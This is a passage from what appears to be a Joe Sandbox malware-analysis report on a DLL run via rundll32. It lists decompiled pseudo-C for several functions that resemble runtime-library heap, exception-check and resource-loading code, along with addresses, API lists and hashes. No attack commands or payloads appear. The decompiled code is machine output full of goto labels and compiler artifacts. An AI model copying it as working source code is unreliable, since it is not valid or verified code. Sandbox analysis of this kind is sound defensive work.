                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$ParentWindow$CopyEqualVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 545338366-0
                                                                                                            • Opcode ID: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                                                            • Instruction ID: 33a625b915a49ab54241972194f75ebdbdf7b4231d1b3c0eb1f8f86e0de30ee8
                                                                                                            • Opcode Fuzzy Hash: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                                                            • Instruction Fuzzy Hash: 86619A71600649AFDB61EFA8DC85FAE77FAEB44300F50812AE959DB196CB30AC45CB11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10014691 Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10014691(signed int _a4) {
				intOrPtr _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				signed int _t51;
				void* _t52;
				signed int _t53;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				signed int* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				signed int _t64;
				signed int* _t66;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				signed int _t70;
				void* _t71;
				intOrPtr _t73;
				void _t74;
				signed int _t75;
				signed int _t76;
				short* _t77;
				void* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;

				_t92 = _a4;
				_t69 =  *(_t92 + 8);
				if((_t69 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x18];
				_t51 = _a4;
				_t73 =  *((intOrPtr*)(_t51 + 8));
				_v8 = _t73;
				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
					_t88 =  *((intOrPtr*)(_t92 + 0xc));
					__eflags = _t88 - 0xffffffff;
					if(_t88 != 0xffffffff) {
						_t81 = 0;
						__eflags = 0;
						_a4 = 0;
						_t52 = _t69;
						do {
							_t74 =  *_t52;
							__eflags = _t74 - 0xffffffff;
							if(_t74 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t74 - _t81;
							if(_t74 >= _t81) {
								L41:
								_t56 = 0;
								L57:
								return _t56;
							}
							L9:
							__eflags =  *(_t52 + 4);
							if( *(_t52 + 4) != 0) {
								_t13 =  &_a4;
								 *_t13 = _a4 + 1;
								__eflags =  *_t13;
							}
							_t81 = _t81 + 1;
							_t52 = _t52 + 0xc;
							__eflags = _t81 - _t88;
						} while (_t81 <= _t88);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t53 =  *0x1004f590; // 0x0
							_t91 = _t69 & 0xfffff000;
							_t93 = 0;
							__eflags = _t53;
							if(_t53 <= 0) {
								L18:
								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
								__eflags = _t55;
								if(_t55 == 0) {
									L56:
									_t56 = _t55 | 0xffffffff;
									__eflags = _t56;
									goto L57;
								}
								__eflags = _v36.Type - 0x1000000;
								if(_v36.Type != 0x1000000) {
									goto L56;
								}
								__eflags = _v36.Protect & 0x000000cc;
								if((_v36.Protect & 0x000000cc) == 0) {
									L28:
									_t57 = InterlockedExchange(0x1004f5d8, 1);
									__eflags = _t57;
									if(_t57 != 0) {
										goto L5;
									}
									_t75 =  *0x1004f590; // 0x0
									__eflags = _t75;
									_t82 = _t75;
									if(_t75 <= 0) {
										L33:
										__eflags = _t82;
										if(_t82 != 0) {
											L40:
											InterlockedExchange(0x1004f5d8, 0);
											goto L5;
										}
										_t70 = 0xf;
										__eflags = _t75 - _t70;
										if(_t75 <= _t70) {
											_t70 = _t75;
										}
										_t83 = 0;
										__eflags = _t70;
										if(_t70 < 0) {
											L38:
											__eflags = _t75 - 0x10;
											if(_t75 < 0x10) {
												_t76 = _t75 + 1;
												__eflags = _t76;
												 *0x1004f590 = _t76;
											}
											goto L40;
										} else {
											do {
												_t60 = 0x1004f598 + _t83 * 4;
												_t83 = _t83 + 1;
												__eflags = _t83 - _t70;
												 *_t60 = _t91;
												_t91 =  *_t60;
											} while (_t83 <= _t70);
											goto L38;
										}
									}
									_t61 = 0x1004f594 + _t75 * 4;
									while(1) {
										__eflags =  *_t61 - _t91;
										if( *_t61 == _t91) {
											goto L33;
										}
										_t82 = _t82 - 1;
										_t61 = _t61 - 4;
										__eflags = _t82;
										if(_t82 > 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
								_t77 = _v36.AllocationBase;
								__eflags =  *_t77 - 0x5a4d;
								if( *_t77 != 0x5a4d) {
									goto L56;
								}
								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
								__eflags =  *_t55 - 0x4550;
								if( *_t55 != 0x4550) {
									goto L56;
								}
								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
								if( *((short*)(_t55 + 0x18)) != 0x10b) {
									goto L56;
								}
								_t71 = _t69 - _t77;
								__eflags =  *((short*)(_t55 + 6));
								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
								if( *((short*)(_t55 + 6)) <= 0) {
									goto L56;
								}
								_t63 =  *((intOrPtr*)(_t79 + 0xc));
								__eflags = _t71 - _t63;
								if(_t71 < _t63) {
									goto L28;
								}
								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
									goto L28;
								}
								__eflags =  *(_t79 + 0x27) & 0x00000080;
								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
									goto L41;
								}
								goto L28;
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 + 1;
								__eflags = _t93 - _t53;
								if(_t93 < _t53) {
									continue;
								}
								goto L18;
							}
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L5;
							}
							_t64 = InterlockedExchange(0x1004f5d8, 1);
							__eflags = _t64;
							if(_t64 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
							if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
								L53:
								_t80 = 0;
								__eflags = _t93;
								if(_t93 < 0) {
									L55:
									InterlockedExchange(0x1004f5d8, 0);
									goto L5;
								} else {
									goto L54;
								}
								do {
									L54:
									_t66 = 0x1004f598 + _t80 * 4;
									_t80 = _t80 + 1;
									__eflags = _t80 - _t93;
									 *_t66 = _t91;
									_t91 =  *_t66;
								} while (_t80 <= _t93);
								goto L55;
							}
							_t67 =  *0x1004f590; // 0x0
							_t43 = _t67 - 1; // -1
							_t93 = _t43;
							__eflags = _t93;
							if(_t93 < 0) {
								L49:
								__eflags = _t67 - 0x10;
								if(_t67 < 0x10) {
									_t67 = _t67 + 1;
									__eflags = _t67;
									 *0x1004f590 = _t67;
								}
								_t46 = _t67 - 1; // 0x0
								_t93 = _t46;
								goto L53;
							} else {
								goto L46;
							}
							while(1) {
								L46:
								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 - 1;
								__eflags = _t93;
								if(_t93 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t93;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L55;
								}
								goto L53;
							}
							goto L49;
						}
						_t68 =  *((intOrPtr*)(_t92 - 8));
						__eflags = _t68 - _v8;
						if(_t68 < _v8) {
							goto L41;
						}
						__eflags = _t68 - _t92;
						if(_t68 >= _t92) {
							goto L41;
						}
						goto L15;
					}
					L5:
					_t56 = 1;
					goto L57;
				} else {
					goto L3;
				}
			}



































                                                                                                            0x10014699
                                                                                                            0x1001469c
                                                                                                            0x100146a2
                                                                                                            0x100146bf
                                                                                                            0x00000000
                                                                                                            0x100146bf
                                                                                                            0x100146aa
                                                                                                            0x100146ad
                                                                                                            0x100146b0
                                                                                                            0x100146b5
                                                                                                            0x100146b8
                                                                                                            0x100146c7
                                                                                                            0x100146ca
                                                                                                            0x100146cd
                                                                                                            0x100146d7
                                                                                                            0x100146d7
                                                                                                            0x100146d9
                                                                                                            0x100146dc
                                                                                                            0x100146de
                                                                                                            0x100146de
                                                                                                            0x100146e0
                                                                                                            0x100146e3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100146e5
                                                                                                            0x100146e7
                                                                                                            0x10014832
                                                                                                            0x10014832
                                                                                                            0x100148b5
                                                                                                            0x00000000
                                                                                                            0x100148b5
                                                                                                            0x100146ed
                                                                                                            0x100146ed
                                                                                                            0x100146f1
                                                                                                            0x100146f3
                                                                                                            0x100146f3
                                                                                                            0x100146f3
                                                                                                            0x100146f3
                                                                                                            0x100146f6
                                                                                                            0x100146f7
                                                                                                            0x100146fa
                                                                                                            0x100146fa
                                                                                                            0x100146fe
                                                                                                            0x10014702
                                                                                                            0x10014718
                                                                                                            0x10014718
                                                                                                            0x1001471f
                                                                                                            0x10014725
                                                                                                            0x10014727
                                                                                                            0x10014729
                                                                                                            0x1001473d
                                                                                                            0x10014744
                                                                                                            0x1001474a
                                                                                                            0x1001474c
                                                                                                            0x100148b2
                                                                                                            0x100148b2
                                                                                                            0x100148b2
                                                                                                            0x00000000
                                                                                                            0x100148b2
                                                                                                            0x10014752
                                                                                                            0x10014759
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001475f
                                                                                                            0x10014763
                                                                                                            0x100147bb
                                                                                                            0x100147c2
                                                                                                            0x100147c8
                                                                                                            0x100147ca
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100147d0
                                                                                                            0x100147d6
                                                                                                            0x100147d8
                                                                                                            0x100147da
                                                                                                            0x100147ef
                                                                                                            0x100147ef
                                                                                                            0x100147f1
                                                                                                            0x10014820
                                                                                                            0x10014827
                                                                                                            0x00000000
                                                                                                            0x10014827
                                                                                                            0x100147f5
                                                                                                            0x100147f6
                                                                                                            0x100147f8
                                                                                                            0x100147fa
                                                                                                            0x100147fa
                                                                                                            0x100147fc
                                                                                                            0x100147fe
                                                                                                            0x10014800
                                                                                                            0x10014814
                                                                                                            0x10014814
                                                                                                            0x10014817
                                                                                                            0x10014819
                                                                                                            0x10014819
                                                                                                            0x1001481a
                                                                                                            0x1001481a
                                                                                                            0x00000000
                                                                                                            0x10014802
                                                                                                            0x10014802
                                                                                                            0x10014802
                                                                                                            0x1001480b
                                                                                                            0x1001480c
                                                                                                            0x1001480e
                                                                                                            0x10014810
                                                                                                            0x10014810
                                                                                                            0x00000000
                                                                                                            0x10014802
                                                                                                            0x10014800
                                                                                                            0x100147dc
                                                                                                            0x100147e3
                                                                                                            0x100147e3
                                                                                                            0x100147e5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100147e7
                                                                                                            0x100147e8
                                                                                                            0x100147eb
                                                                                                            0x100147ed
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100147ed
                                                                                                            0x00000000
                                                                                                            0x100147e3
                                                                                                            0x10014765
                                                                                                            0x10014768
                                                                                                            0x1001476d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014776
                                                                                                            0x10014778
                                                                                                            0x1001477e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014784
                                                                                                            0x1001478a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014790
                                                                                                            0x10014792
                                                                                                            0x1001479b
                                                                                                            0x1001479f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100147a5
                                                                                                            0x100147a8
                                                                                                            0x100147aa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100147b1
                                                                                                            0x100147b3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100147b5
                                                                                                            0x100147b9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001472b
                                                                                                            0x1001472b
                                                                                                            0x1001472b
                                                                                                            0x10014732
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014738
                                                                                                            0x10014739
                                                                                                            0x1001473b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001473b
                                                                                                            0x10014836
                                                                                                            0x10014838
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001484b
                                                                                                            0x1001484d
                                                                                                            0x1001484f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014855
                                                                                                            0x1001485c
                                                                                                            0x1001488c
                                                                                                            0x1001488c
                                                                                                            0x1001488e
                                                                                                            0x10014890
                                                                                                            0x100148a4
                                                                                                            0x100148ab
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014892
                                                                                                            0x10014892
                                                                                                            0x10014892
                                                                                                            0x1001489b
                                                                                                            0x1001489c
                                                                                                            0x1001489e
                                                                                                            0x100148a0
                                                                                                            0x100148a0
                                                                                                            0x00000000
                                                                                                            0x10014892
                                                                                                            0x1001485e
                                                                                                            0x10014863
                                                                                                            0x10014863
                                                                                                            0x10014866
                                                                                                            0x10014868
                                                                                                            0x1001487a
                                                                                                            0x1001487a
                                                                                                            0x1001487d
                                                                                                            0x1001487f
                                                                                                            0x1001487f
                                                                                                            0x10014880
                                                                                                            0x10014880
                                                                                                            0x10014885
                                                                                                            0x10014885
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001486a
                                                                                                            0x1001486a
                                                                                                            0x1001486a
                                                                                                            0x10014871
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014873
                                                                                                            0x10014873
                                                                                                            0x10014874
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014874
                                                                                                            0x10014876
                                                                                                            0x10014878
                                                                                                            0x1001488a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001488a
                                                                                                            0x00000000
                                                                                                            0x10014878
                                                                                                            0x10014704
                                                                                                            0x10014707
                                                                                                            0x1001470a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014710
                                                                                                            0x10014712
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014712
                                                                                                            0x100146cf
                                                                                                            0x100146d1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,10010A4D,?), ref: 10014744
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 100147C2
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 10014827
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 1001484B
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 100148AB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExchangeInterlocked$QueryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2947987494-0
                                                                                                            • Opcode ID: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                                                            • Instruction ID: 9d228fb4bd3535bae3d62daabf15c01b9b2423e99f84aa7b143aff86640a32b5
                                                                                                            • Opcode Fuzzy Hash: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                                                            • Instruction Fuzzy Hash: 3851C130A00A928FE718CF18C8D8A6C73E1EB46795F678169DA45DF2B1EF70DCC18A45
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001234F Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 54%
                                                                                                            			E1001234F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t30;
				long _t31;
				long _t33;
				void* _t36;
				long _t38;
				long _t41;
				long _t42;
				long _t44;
				long _t46;
				void* _t59;
				long _t61;
				void* _t67;
				void* _t68;

				_push(0x14);
				_push(0x10041dc0);
				E10012514(__ebx, __edi, __esi);
				_t59 =  *(_t67 + 8);
				if(_t59 != 0) {
					_t61 =  *(_t67 + 0xc);
					__eflags = _t61;
					if(__eflags != 0) {
						__eflags =  *0x10050a64 - 3;
						if( *0x10050a64 != 3) {
							while(1) {
								_t28 = 0;
								__eflags = _t61 - 0xffffffe0;
								if(_t61 <= 0xffffffe0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t28 = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
								}
								__eflags = _t28;
								if(_t28 != 0) {
									goto L37;
								}
								__eflags =  *0x1004f58c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								_t30 = E10014676(_t61);
								__eflags = _t30;
								if(_t30 != 0) {
									continue;
								}
								goto L36;
							}
							goto L37;
						} else {
							goto L5;
						}
						do {
							L5:
							 *(_t67 - 0x1c) = 0;
							__eflags = _t61 - 0xffffffe0;
							if(_t61 > 0xffffffe0) {
								L25:
								_t28 =  *(_t67 - 0x1c);
								__eflags =  *(_t67 - 0x1c);
								if( *(_t67 - 0x1c) != 0) {
									goto L37;
								}
								__eflags =  *0x1004f58c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								goto L27;
							}
							E10013A38(0, _t59, 4);
							 *(_t67 - 4) = 0;
							_t33 = E10013B9B(_t59);
							 *(_t67 - 0x20) = _t33;
							__eflags = _t33;
							if(_t33 == 0) {
								L21:
								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
								E100124B7();
								__eflags =  *(_t67 - 0x20);
								if( *(_t67 - 0x20) == 0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t61 = _t61 + 0x0000000f & 0xfffffff0;
									__eflags = _t61;
									 *(_t67 + 0xc) = _t61;
									 *(_t67 - 0x1c) = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
								}
								goto L25;
							}
							__eflags = _t61 -  *0x10050a50; // 0x0
							if(__eflags <= 0) {
								_push(_t61);
								_push(_t59);
								_push(_t33);
								_t41 = E1001409B();
								_t68 = _t68 + 0xc;
								__eflags = _t41;
								if(_t41 == 0) {
									_push(_t61);
									_t42 = E1001437A();
									 *(_t67 - 0x1c) = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
										 *(_t67 - 0x24) = _t44;
										__eflags = _t44 - _t61;
										if(_t44 >= _t61) {
											_t44 = _t61;
										}
										E10011440( *(_t67 - 0x1c), _t59, _t44);
										_t46 = E10013B9B(_t59);
										 *(_t67 - 0x20) = _t46;
										_push(_t59);
										_push(_t46);
										E10013BC6();
										_t68 = _t68 + 0x18;
									}
								} else {
									 *(_t67 - 0x1c) = _t59;
								}
							}
							__eflags =  *(_t67 - 0x1c);
							if( *(_t67 - 0x1c) == 0) {
								__eflags = _t61;
								if(_t61 == 0) {
									_t61 = 1;
									__eflags = 1;
									 *(_t67 + 0xc) = 1;
								}
								_t61 = _t61 + 0x0000000f & 0xfffffff0;
								 *(_t67 + 0xc) = _t61;
								_t36 = HeapAlloc( *0x10050a60, 0, _t61);
								 *(_t67 - 0x1c) = _t36;
								__eflags = _t36;
								if(_t36 != 0) {
									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
									 *(_t67 - 0x24) = _t38;
									__eflags = _t38 - _t61;
									if(_t38 >= _t61) {
										_t38 = _t61;
									}
									E10011440( *(_t67 - 0x1c), _t59, _t38);
									_push(_t59);
									_push( *(_t67 - 0x20));
									E10013BC6();
									_t68 = _t68 + 0x14;
								}
							}
							goto L21;
							L27:
							_t31 = E10014676(_t61);
							__eflags = _t31;
						} while (_t31 != 0);
						goto L36;
					} else {
						_push(_t59);
						E100107C8(0, _t59, _t61, __eflags);
						L36:
						_t28 = 0;
						__eflags = 0;
						goto L37;
					}
				} else {
					_t28 = E100107B6( *(_t67 + 0xc));
					L37:
					return E1001254F(_t28);
				}
			}
















                                                                                                            0x1001234f
                                                                                                            0x10012351
                                                                                                            0x10012356
                                                                                                            0x1001235b
                                                                                                            0x10012362
                                                                                                            0x10012372
                                                                                                            0x10012375
                                                                                                            0x10012377
                                                                                                            0x10012385
                                                                                                            0x1001238c
                                                                                                            0x100124c0
                                                                                                            0x100124c0
                                                                                                            0x100124c2
                                                                                                            0x100124c5
                                                                                                            0x100124c7
                                                                                                            0x100124c9
                                                                                                            0x100124cd
                                                                                                            0x100124cd
                                                                                                            0x100124cd
                                                                                                            0x100124d7
                                                                                                            0x100124d7
                                                                                                            0x100124dd
                                                                                                            0x100124df
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100124e1
                                                                                                            0x100124e7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100124ea
                                                                                                            0x100124f0
                                                                                                            0x100124f2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100124f2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10012392
                                                                                                            0x10012392
                                                                                                            0x10012392
                                                                                                            0x10012395
                                                                                                            0x10012398
                                                                                                            0x1001248f
                                                                                                            0x1001248f
                                                                                                            0x10012492
                                                                                                            0x10012494
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10012496
                                                                                                            0x1001249c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001249c
                                                                                                            0x100123a0
                                                                                                            0x100123a6
                                                                                                            0x100123aa
                                                                                                            0x100123b0
                                                                                                            0x100123b3
                                                                                                            0x100123b5
                                                                                                            0x1001245f
                                                                                                            0x1001245f
                                                                                                            0x10012463
                                                                                                            0x10012468
                                                                                                            0x1001246b
                                                                                                            0x1001246d
                                                                                                            0x1001246f
                                                                                                            0x10012473
                                                                                                            0x10012473
                                                                                                            0x10012473
                                                                                                            0x10012477
                                                                                                            0x10012477
                                                                                                            0x1001247a
                                                                                                            0x1001248c
                                                                                                            0x1001248c
                                                                                                            0x00000000
                                                                                                            0x1001246b
                                                                                                            0x100123bb
                                                                                                            0x100123c1
                                                                                                            0x100123c3
                                                                                                            0x100123c4
                                                                                                            0x100123c5
                                                                                                            0x100123c6
                                                                                                            0x100123cb
                                                                                                            0x100123ce
                                                                                                            0x100123d0
                                                                                                            0x100123d7
                                                                                                            0x100123d8
                                                                                                            0x100123de
                                                                                                            0x100123e1
                                                                                                            0x100123e3
                                                                                                            0x100123e8
                                                                                                            0x100123e9
                                                                                                            0x100123ec
                                                                                                            0x100123ee
                                                                                                            0x100123f0
                                                                                                            0x100123f0
                                                                                                            0x100123f7
                                                                                                            0x100123fd
                                                                                                            0x10012402
                                                                                                            0x10012405
                                                                                                            0x10012406
                                                                                                            0x10012407
                                                                                                            0x1001240c
                                                                                                            0x1001240c
                                                                                                            0x100123d2
                                                                                                            0x100123d2
                                                                                                            0x100123d2
                                                                                                            0x100123d0
                                                                                                            0x1001240f
                                                                                                            0x10012412
                                                                                                            0x10012414
                                                                                                            0x10012416
                                                                                                            0x1001241a
                                                                                                            0x1001241a
                                                                                                            0x1001241b
                                                                                                            0x1001241b
                                                                                                            0x10012421
                                                                                                            0x10012424
                                                                                                            0x1001242f
                                                                                                            0x10012435
                                                                                                            0x10012438
                                                                                                            0x1001243a
                                                                                                            0x1001243f
                                                                                                            0x10012440
                                                                                                            0x10012443
                                                                                                            0x10012445
                                                                                                            0x10012447
                                                                                                            0x10012447
                                                                                                            0x1001244e
                                                                                                            0x10012453
                                                                                                            0x10012454
                                                                                                            0x10012457
                                                                                                            0x1001245c
                                                                                                            0x1001245c
                                                                                                            0x1001243a
                                                                                                            0x00000000
                                                                                                            0x1001249e
                                                                                                            0x1001249f
                                                                                                            0x100124a5
                                                                                                            0x100124a5
                                                                                                            0x00000000
                                                                                                            0x10012379
                                                                                                            0x10012379
                                                                                                            0x1001237a
                                                                                                            0x100124f4
                                                                                                            0x100124f4
                                                                                                            0x100124f4
                                                                                                            0x00000000
                                                                                                            0x100124f4
                                                                                                            0x10012364
                                                                                                            0x10012367
                                                                                                            0x100124f6
                                                                                                            0x100124fb
                                                                                                            0x100124fb

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                                                            • Instruction ID: a1aac842a28fd1c9b1a5d11719d9853ed47685f9db5387583b2c03217e3948c7
                                                                                                            • Opcode Fuzzy Hash: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                                                            • Instruction Fuzzy Hash: A641F5F1D002669FCB20EF698C8489F7AB4EB417A47124129FA24AE151D734DDE0DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100071BF Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E100071BF(intOrPtr* __ecx, void* _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t59;
				signed int _t61;
				signed int _t62;
				void* _t64;
				int* _t72;
				struct HWND__* _t73;
				intOrPtr _t78;
				struct HRSRC__* _t81;
				void* _t82;
				void* _t86;
				void* _t88;
				void* _t89;
				intOrPtr _t90;
				void* _t93;
				intOrPtr _t95;
				intOrPtr _t101;
				intOrPtr _t103;
				struct HINSTANCE__* _t105;
				intOrPtr* _t106;
				void* _t107;

				_t106 = __ecx;
				_v8 = 0;
				_v12 = 0;
				if(_a8 != 0) {
					_t105 =  *(E100373B5() + 0xc);
					_t81 = FindResourceA(_t105, _a8, 0xf0);
					if(_t81 != 0) {
						_t82 = LoadResource(_t105, _t81);
						_v12 = _t82;
						if(_t82 == 0) {
							return 0;
						}
						_v8 = LockResource(_t82);
					}
				}
				__eflags = _v8;
				_t86 = _a4;
				_t103 = _a12;
				_v16 = 1;
				if(_v8 != 0) {
					_t78 =  *((intOrPtr*)( *_t106 + 0x1c))(_t86, _v8, _t103);
					__eflags = _v12;
					_v16 = _t78;
					if(_v12 != 0) {
						FreeResource(_v12);
					}
				}
				_t59 =  *(_t86 + 0x48);
				__eflags = _t59;
				if(_t59 == 0) {
					L25:
					return _v16;
				} else {
					_t88 =  *(_t59 + 0x40);
					_a8 = _a8 & 0x00000000;
					__eflags = _t88;
					_a4 = _t88;
					_v12 = _t88;
					if(_t88 != 0) {
						_a8 =  *(E10006D96( &_a4));
					}
					_t61 = 0;
					__eflags =  *(_t103 + 8);
					_v8 = 0;
					if( *(_t103 + 8) > 0) {
						do {
							_t89 = _a8;
							__eflags = _t89;
							if(_t89 == 0) {
								L17:
								_t90 =  *((intOrPtr*)(_t103 + 0xc));
								_t62 = _t61 << 3;
								__eflags =  *(_t62 + _t90);
								_v20 = _t62;
								if( *(_t62 + _t90) != 0) {
									_t107 = E1001F77E(0xc);
